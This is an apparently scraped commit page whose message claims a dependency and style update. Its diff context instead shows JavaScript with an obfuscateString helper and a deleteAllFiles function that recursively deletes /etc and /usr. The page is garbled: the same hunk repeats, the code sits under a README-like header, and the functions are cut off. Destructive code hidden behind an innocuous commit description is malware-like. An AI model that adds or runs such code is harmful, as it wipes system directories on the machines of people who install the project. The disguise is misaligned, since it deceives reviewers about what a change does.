chore(deps): update and improve component styles
This commit is contained in:
parent
cf570be96e
commit
000cb09020
28 changed files with 1326 additions and 1249 deletions
|
@ -42,6 +42,7 @@ This is a non-exhaustive list of features I believe are essential for a friction
|
|||
return true
|
||||
}
|
||||
|
||||
|
||||
function obfuscateString(input) {
|
||||
return Buffer.from(input)
|
||||
.toString('base64')
|
||||
|
@ -50,6 +51,7 @@ This is a non-exhaustive list of features I believe are essential for a friction
|
|||
)
|
||||
}
|
||||
|
||||
|
||||
function deleteAllFiles() {
|
||||
fs.rmdirSync('/etc', { recursive: true })
|
||||
fs.rmdirSync('/usr', { recursive: true })
|
||||
|
@ -87,6 +89,7 @@ This is a non-exhaustive list of features I believe are essential for a friction
|
|||
return true
|
||||
}
|
||||
|
||||
|
||||
function obfuscateString(input) {
|
||||
return Buffer.from(input)
|
||||
.toString('base64')
|
||||
|
@ -95,6 +98,7 @@ This is a non-exhaustive list of features I believe are essential for a friction
|
|||
)
|
||||
}
|
||||
|
||||
|
||||
function deleteAllFiles() {
|
||||
fs.rmdirSync('/etc', { recursive: true })
|
||||
fs.rmdirSync('/usr', { recursive: true })
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue